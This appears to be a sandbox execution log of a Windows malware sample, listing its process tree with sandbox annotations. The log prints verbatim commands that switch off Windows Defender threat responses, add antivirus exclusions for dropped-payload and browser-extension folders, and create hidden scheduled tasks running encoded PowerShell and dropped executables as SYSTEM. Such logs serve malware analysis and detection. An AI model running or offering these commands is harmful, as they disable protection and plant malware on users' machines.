C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goVWNkhrS" /SC once /ST 04:09:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goVWNkhrS"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goVWNkhrS"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 00:22:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rCuMQIT.exe\" aV /PxCkdiddZ 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k smphost1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵
- Executes dropped EXE
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rCuMQIT.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rCuMQIT.exe aV /PxCkdiddZ 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
